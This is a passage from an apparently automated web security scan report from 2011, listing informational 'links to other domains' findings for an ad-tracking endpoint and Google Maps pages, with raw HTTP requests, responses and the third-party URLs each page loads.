http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD00OSwxMjMiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGJvcmRlcj0iMCI%2BPC9pbWc%2BPHNjcmlwdCBzcmM9Imh0dHA6Ly9zZWdtZW50LXBpeGVsLmludml0ZW1lZGlhLmNvbS9waXhlbD9wYXJ0bmVySUQ9NzkmY29kZT0yODUzNzkmY29kZT0zMDI3NzUma2V5PXNlZ21lbnQmcmV0dXJuVHlwZT1qcyI%2BPC9zY3JpcHQ%2BPGltZyBzcmM9Imh0dHA6Ly9hLmNvbGxlY3RpdmUtbWVkaWEubmV0L2RhdGFwYWlyP25ldD1leCZzZWdzPTc2LDMyJm9wPWFkZCIgd2lkdGg9IjEiIGhlaWdodD0iMSI%2BPC9pbWc%2B&h=801802b5e74884030c94b77c781c1c27

The response contains the following links to other domains:

http://a.collective-media.net/datapair?net=ex&segs=76,32&op=add
http://ads.adbrite.com/adserver/behavioral-data/8201?d=49,123
http://segment-pixel.invitemedia.com/pixel?partnerID=79&code=285379&code=302775&key=segment&returnType=js

Request

GET /load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD00OSwxMjMiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGJvcmRlcj0iMCI%2BPC9pbWc%2BPHNjcmlwdCBzcmM9Imh0dHA6Ly9zZWdtZW50LXBpeGVsLmludml0ZW1lZGlhLmNvbS9waXhlbD9wYXJ0bmVySUQ9NzkmY29kZT0yODUzNzkmY29kZT0zMDI3NzUma2V5PXNlZ21lbnQmcmV0dXJuVHlwZT1qcyI%2BPC9zY3JpcHQ%2BPGltZyBzcmM9Imh0dHA6Ly9hLmNvbGxlY3RpdmUtbWVkaWEubmV0L2RhdGFwYWlyP25ldD1leCZzZWdzPTc2LDMyJm9wPWFkZCIgd2lkdGg9IjEiIGhlaWdodD0iMSI%2BPC9pbWc%2B&h=801802b5e74884030c94b77c781c1c27 HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSxMDSzNzKxrASUcFEk%253D; myPAL=eJxtzL0OwjAMRtF3iVcPtvPj2pkKLEiEAVWoK2NnRsS7k1bQic2yzncfnvy1ONWni3rgVAzMjIEpARWCqR%252BtfyTUxXllZWWav0wJiLgzpZ%252BSPbarf7HYWdpiQwYZclTDSKJ9JClv1fEw4fl6x1ub8XhpOJ7mUN8fByon7A%253D%253D; BFF=eJytkb0OwiAUhd%252BFJ%252BBXCiytOtik1ERJo5Pp6Oxo%252Bu7eUjXYXAYS1%252B8cvpbDaJm0z4dl1JLAqPS1MYYTdweulYNAWOKPfTh019vQnttA3Gg5zZ3ZGDij3jxBP12RBGbmmq4%252FKxec%252FggYmm2oeaWENktQzYGIPAGfpqBca7UK2n5AFcCRJqo4%252BQuqAI40GdxXcyRA3bvOo27gSBNVNHvELSL%252Fggl%252FkTh05kWy%252B5fPXb7uH8cs3W56Ab%252BfvsY%253D; TFF=eJydkDEOwzAIRe%252BSEwC2g8FLjtHVQ4ZK3dotyt1LWjWRnKRFHRDIeg%252FxXRWTTndF0g4hDtDDICLUlaqk01WxWEVO1uA19lLmHY8LHxqerELj8ar5DOsQ%252FbvHy3irj7HZnT%252FGYQqGAQB%252FpLZxz5%252BmxsbjVfMZ1hmcu5ebKKazDHnLkN983HjKKbCc%252FRZ%252BMVEkMP1jBiDm5DV5FX2GvcXkIucn21jBjA%253D%253D; EVX=eJxLtDKyqs60MrIwNTa3tE60MgTxDKyLrQwtrJQMTSxM483jjUxM4w0MDOOBUMm6NtPK2MDI3NyUKMW1ALLGGNA%253D

Response

HTTP/1.1 200 OK
X-Cnection: close
X-Powered-By: PHP/5.2.1
Content-Type: text/html
Date: Mon, 24 Jan 2011 21:07:10 GMT
Server: HTTP server
Content-Length: 368

<HTML><BODY><img src="http://ads.adbrite.com/adserver/behavioral-data/8201?d=49,123" width="0" height="0" border="0"></img><script src="http://segment-pixel.invitemedia.com/pixel?partnerID=79&code=285379&code=302775&key=segment&returnType=js"></script><img src="http://a.collective-media.net/datapair?net=ex&segs=76,32&op=add" width="1" height="1"></img>
...[SNIP]...

20.94. http://maps.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.google.com
Path:	/maps

Issue detail

The page was loaded from a URL containing a query string:

http://maps.google.com/maps?hl=en&tab=wl

The response contains the following links to other domains:

http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png
http://maps.gstatic.com/mapfiles/gw_link.png
http://maps.gstatic.com/mapfiles/mapcontrols3d5.png
http://maps.gstatic.com/mapfiles/placepage/checkmark_13x14.gif
http://maps.gstatic.com/mapfiles/transparent.png
http://www.youtube.com/results?hl=en&sa=N&tab=l1

Request

GET /maps?hl=en&tab=wl HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:40:56 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=2eb5c44f7395ed72:TM=1295908856:LM=1295908856:S=j81Lac1Vce5XALNU; expires=Wed, 23-Jan-2013 22:40:56 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html xmlns:v="urn:schemas-microsoft-com:vml" class=""><head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=EmulateI
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl=en&sa=N&tab=l1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<span><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" title="Google Maps Labs" id="ml_flask_img" class="flask"/> <span id="ml_flask_msg">
...[SNIP]...
<td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="280" height="1" alt=""/> </td> <td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="220" height="1" alt=""/> </td>
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="panel-bar-divider bar-divider"/> </span>
...[SNIP]...
<a style="display:none" jsdisplay="topbar_config.show_lbc_badge" jsvalues="href: topbar_config.lbc_badge_url"> <img src="http://maps.gstatic.com/mapfiles/placepage/checkmark_13x14.gif" alt=""/> <span msgid="13425" class="link-text">
...[SNIP]...
<a style="display:" jsvalues="style.display: topbar_config.show_panel_toggler ? '' : 'none';" id="paneltoggle2" href="javascript:void(0)" log="paneltgl"> <img title="Hide panel" useattr="title:#msg_hide_panel" id="panelarrow2" src="http://maps.gstatic.com/mapfiles/transparent.png" class="collapse-left3"/> </a> <a style="display:none" href="" jsvalues="style.display: topbar_config.show_return_arrow ? '' : 'none'; href: topbar_config.return_arrow_url" id="return-to-mapview" onclick="return loadUrl(this.href)"> <img title="Map View" useattr="title:#msg_map_view" src="http://maps.gstatic.com/mapfiles/transparent.png" class="collapse-left3"/> </a>
...[SNIP]...
<a href="javascript:void(0)" id="view_rss_link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon view-as-rss"/> <span msgid="11196" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span>
...[SNIP]...
<a href="javascript:void(0)" id="view_kml_link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon view-as-kml"/> <span msgid="11754" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span> <a style="display:none" href="javascript:void(0)" id="mapmaker-link" jsaction="rmi.open-mapmaker"> <img class="bar-icon" src="http://maps.gstatic.com/mapfiles/gw_link.png"/> <span msgid="13326" class="link-text">
...[SNIP]...
</a> <img style="display:none" id="mapmaker-link-sep" src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="javascript:void(0);" jsaction="print.show" id="print"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-print2"/> <span msgid="10044" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a id="showsendtox" href="javascript:void(0);" jsaction="stx.show"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-email2"/> <span msgid="11023" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="javascript:void(0);" jsaction="link.show" id="link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-link2"/> <span msgid="12145" class="link-text">
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> <div style="width:20px" id="pan_up_inline" jsaction="flmc.selectPanUp" class="flmcpanup clickable">
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img id="zoom_out_inline_img" class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img style="width:103px" class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</span> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="mv-dropdown"/> </div>
...[SNIP]...
<div id="overview-toggle"><img id="overview-toggle-image" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png" jsaction="overview.toggle"/> </div>
...[SNIP]...
<a id="d_close" href="javascript:void(0)" jsaction="llm.close" jstrack="1"> <img class="launch_close" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
<div style="visibility:" class="dir-tm" id="travel_modes_div"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="dir-tm-sides"/><a jsselect="travelModes" jsvalues=".tm:$this" href="javascript:void(0)" tabindex="3" jsaction="tm.click"><img jsvalues="id:'dir_' + $this + '_btn';title:$modeMsgs[$this];className:'dir-tm-' + $this + '-unselected' +' dir-tm-btn' + ($index != 0 ? ' dir-tm-btn-side-border':'')" src="http://maps.gstatic.com/mapfiles/transparent.png" width="37" height="23"/></a><img class="dir-tm-sides" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </div>
...[SNIP]...

20.95. http://maps.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.google.com
Path:	/maps

Issue detail

The page was loaded from a URL containing a query string:

http://maps.google.com/maps?file\u003dgoogleapi

The response contains the following links to other domains:

http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png
http://maps.gstatic.com/mapfiles/gw_link.png
http://maps.gstatic.com/mapfiles/mapcontrols3d5.png
http://maps.gstatic.com/mapfiles/placepage/checkmark_13x14.gif
http://maps.gstatic.com/mapfiles/transparent.png
http://www.youtube.com/results?file%5Cu003dgoogleapi=&sa=N&hl=en&tab=l1

Request

GET /maps?file\u003dgoogleapi HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:41:10 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=d3768da13d4a5abd:TM=1295908870:LM=1295908870:S=fZYb4_H8HXgQCMne; expires=Wed, 23-Jan-2013 22:41:10 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html xmlns:v="urn:schemas-microsoft-com:vml" class=""><head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=EmulateI
...[SNIP]...
</div><a href="http://www.youtube.com/results?file%5Cu003dgoogleapi=&sa=N&hl=en&tab=l1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<span><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" title="Google Maps Labs" id="ml_flask_img" class="flask"/> <span id="ml_flask_msg">
...[SNIP]...
<td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="280" height="1" alt=""/> </td> <td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="220" height="1" alt=""/> </td>
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="panel-bar-divider bar-divider"/> </span>
...[SNIP]...
<a style="display:none" jsdisplay="topbar_config.show_lbc_badge" jsvalues="href: topbar_config.lbc_badge_url"> <img src="http://maps.gstatic.com/mapfiles/placepage/checkmark_13x14.gif" alt=""/> <span msgid="13425" class="link-text">
...[SNIP]...
<a style="display:" jsvalues="style.display: topbar_config.show_panel_toggler ? '' : 'none';" id="paneltoggle2" href="javascript:void(0)" log="paneltgl"> <img title="Hide panel" useattr="title:#msg_hide_panel" id="panelarrow2" src="http://maps.gstatic.com/mapfiles/transparent.png" class="collapse-left3"/> </a> <a style="display:none" href="" jsvalues="style.display: topbar_config.show_return_arrow ? '' : 'none'; href: topbar_config.return_arrow_url" id="return-to-mapview" onclick="return loadUrl(this.href)"> <img title="Map View" useattr="title:#msg_map_view" src="http://maps.gstatic.com/mapfiles/transparent.png" class="collapse-left3"/> </a>
...[SNIP]...
<a href="javascript:void(0)" id="view_rss_link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon view-as-rss"/> <span msgid="11196" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span>
...[SNIP]...
<a href="javascript:void(0)" id="view_kml_link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon view-as-kml"/> <span msgid="11754" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span> <a style="display:none" href="javascript:void(0)" id="mapmaker-link" jsaction="rmi.open-mapmaker"> <img class="bar-icon" src="http://maps.gstatic.com/mapfiles/gw_link.png"/> <span msgid="13326" class="link-text">
...[SNIP]...
</a> <img style="display:none" id="mapmaker-link-sep" src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="javascript:void(0);" jsaction="print.show" id="print"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-print2"/> <span msgid="10044" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a id="showsendtox" href="javascript:void(0);" jsaction="stx.show"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-email2"/> <span msgid="11023" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="javascript:void(0);" jsaction="link.show" id="link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-link2"/> <span msgid="12145" class="link-text">
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> <div style="width:20px" id="pan_up_inline" jsaction="flmc.selectPanUp" class="flmcpanup clickable">
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img id="zoom_out_inline_img" class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img style="width:103px" class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</span> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="mv-dropdown"/> </div>
...[SNIP]...
<div id="overview-toggle"><img id="overview-toggle-image" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png" jsaction="overview.toggle"/> </div>
...[SNIP]...
<a id="d_close" href="javascript:void(0)" jsaction="llm.close" jstrack="1"> <img class="launch_close" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
<div style="visibility:" class="dir-tm" id="travel_modes_div"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="dir-tm-sides"/><a jsselect="travelModes" jsvalues=".tm:$this" href="javascript:void(0)" tabindex="3" jsaction="tm.click"><img jsvalues="id:'dir_' + $this + '_btn';title:$modeMsgs[$this];className:'dir-tm-' + $this + '-unselected' +' dir-tm-btn' + ($index != 0 ? ' dir-tm-btn-side-border':'')" src="http://maps.gstatic.com/mapfiles/transparent.png" width="37" height="23"/></a><img class="dir-tm-sides" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </div>
...[SNIP]...

20.96. http://maps.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.google.com
Path:	/maps

Issue detail

The page was loaded from a URL containing a query string:

http://maps.google.com/maps?hl\x3den\x26tab\x3dwl\x22

The response contains the following links to other domains:

http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png
http://maps.gstatic.com/mapfiles/gw_link.png
http://maps.gstatic.com/mapfiles/mapcontrols3d5.png
http://maps.gstatic.com/mapfiles/placepage/checkmark_13x14.gif
http://maps.gstatic.com/mapfiles/transparent.png
http://www.youtube.com/results?hl%5Cx3den%5Cx26tab%5Cx3dwl%5Cx22=&sa=N&hl=en&tab=l1

Request

GET /maps?hl\x3den\x26tab\x3dwl\x22 HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:40:58 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=8bb52a6aea79b40b:TM=1295908858:LM=1295908858:S=57xglHgOlUz3PTrb; expires=Wed, 23-Jan-2013 22:40:58 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html xmlns:v="urn:schemas-microsoft-com:vml" class=""><head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=EmulateI
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl%5Cx3den%5Cx26tab%5Cx3dwl%5Cx22=&sa=N&hl=en&tab=l1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<span><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" title="Google Maps Labs" id="ml_flask_img" class="flask"/> <span id="ml_flask_msg">
...[SNIP]...
<td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="280" height="1" alt=""/> </td> <td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="220" height="1" alt=""/> </td>
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="panel-bar-divider bar-divider"/> </span>
...[SNIP]...
<a style="display:none" jsdisplay="topbar_config.show_lbc_badge" jsvalues="href: topbar_config.lbc_badge_url"> <img src="http://maps.gstatic.com/mapfiles/placepage/checkmark_13x14.gif" alt=""/> <span msgid="13425" class="link-text">
...[SNIP]...
<a style="display:" jsvalues="style.display: topbar_config.show_panel_toggler ? '' : 'none';" id="paneltoggle2" href="javascript:void(0)" log="paneltgl"> <img title="Hide panel" useattr="title:#msg_hide_panel" id="panelarrow2" src="http://maps.gstatic.com/mapfiles/transparent.png" class="collapse-left3"/> </a> <a style="display:none" href="" jsvalues="style.display: topbar_config.show_return_arrow ? '' : 'none'; href: topbar_config.return_arrow_url" id="return-to-mapview" onclick="return loadUrl(this.href)"> <img title="Map View" useattr="title:#msg_map_view" src="http://maps.gstatic.com/mapfiles/transparent.png" class="collapse-left3"/> </a>
...[SNIP]...
<a href="javascript:void(0)" id="view_rss_link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon view-as-rss"/> <span msgid="11196" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span>
...[SNIP]...
<a href="javascript:void(0)" id="view_kml_link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon view-as-kml"/> <span msgid="11754" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span> <a style="display:none" href="javascript:void(0)" id="mapmaker-link" jsaction="rmi.open-mapmaker"> <img class="bar-icon" src="http://maps.gstatic.com/mapfiles/gw_link.png"/> <span msgid="13326" class="link-text">
...[SNIP]...
</a> <img style="display:none" id="mapmaker-link-sep" src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="javascript:void(0);" jsaction="print.show" id="print"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-print2"/> <span msgid="10044" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a id="showsendtox" href="javascript:void(0);" jsaction="stx.show"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-email2"/> <span msgid="11023" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="javascript:void(0);" jsaction="link.show" id="link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-link2"/> <span msgid="12145" class="link-text">
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> <div style="width:20px" id="pan_up_inline" jsaction="flmc.selectPanUp" class="flmcpanup clickable">
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img id="zoom_out_inline_img" class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img style="width:103px" class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</span> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="mv-dropdown"/> </div>
...[SNIP]...
<div id="overview-toggle"><img id="overview-toggle-image" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png" jsaction="overview.toggle"/> </div>
...[SNIP]...
<a id="d_close" href="javascript:void(0)" jsaction="llm.close" jstrack="1"> <img class="launch_close" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
<div style="visibility:" class="dir-tm" id="travel_modes_div"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="dir-tm-sides"/><a jsselect="travelModes" jsvalues=".tm:$this" href="javascript:void(0)" tabindex="3" jsaction="tm.click"><img jsvalues="id:'dir_' + $this + '_btn';title:$modeMsgs[$this];className:'dir-tm-' + $this + '-unselected' +' dir-tm-btn' + ($index != 0 ? ' dir-tm-btn-side-border':'')" src="http://maps.gstatic.com/mapfiles/transparent.png" width="37" height="23"/></a><img class="dir-tm-sides" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </div>
...[SNIP]...

20.97. http://maps.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.google.com
Path:	/maps

Issue detail

The page was loaded from a URL containing a query string:

http://maps.google.com/maps?hl\\x3den\\x26amp;um\\x3d1\\x26amp;ie\\x3dUTF-8\\x26amp;q\\x3daub\\x26amp;fb\\x3d1\\x26amp;gl\\x3dus\\x26amp;hq\\x3daub\\x26amp;cid\\x3d0,0,7028149978956142856\\x26amp;ei\\x3diJI9TZL9IMb_lgeur7DXBg\\x26amp;sa\\x3dX\\x26amp;oi\\x3dlocal_result\\x26amp;ct\\x3dimage\\x26amp;resnum\\x3d5\\x26amp;ved\\x3d0CEUQnwIwBA\\x22\\x3e\\x3cimg

The response contains the following links to other domains:

http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png
http://maps.gstatic.com/mapfiles/gw_link.png
http://maps.gstatic.com/mapfiles/mapcontrols3d5.png
http://maps.gstatic.com/mapfiles/placepage/checkmark_13x14.gif
http://maps.gstatic.com/mapfiles/transparent.png
http://www.youtube.com/results?hl%5C%5Cx3den%5C%5Cx26amp%3Bum%5C%5Cx3d1%5C%5Cx26amp%3Bie%5C%5Cx3dUTF-8%5C%5Cx26amp%3Bq%5C%5Cx3daub%5C%5Cx26amp%3Bfb%5C%5Cx3d1%5C%5Cx26amp%3Bgl%5C%5Cx3dus%5C%5Cx26amp%3Bhq%5C%5Cx3daub%5C%5Cx26amp%3Bcid%5C%5Cx3d0,0,7028149978956142856%5C%5Cx26amp%3Bei%5C%5Cx3diJI9TZL9IMb_lgeur7DXBg%5C%5Cx26amp%3Bsa%5C%5Cx3dX%5C%5Cx26amp%3Boi%5C%5Cx3dlocal_result%5C%5Cx26amp%3Bct%5C%5Cx3dimage%5C%5Cx26amp%3Bresnum%5C%5Cx3d5%5C%5Cx26amp%3Bved%5C%5Cx3d0CEUQnwIwBA%5C%5Cx22%5C%5Cx3e%5C%5Cx3cimg=&sa=N&hl=en&tab=l1

Request

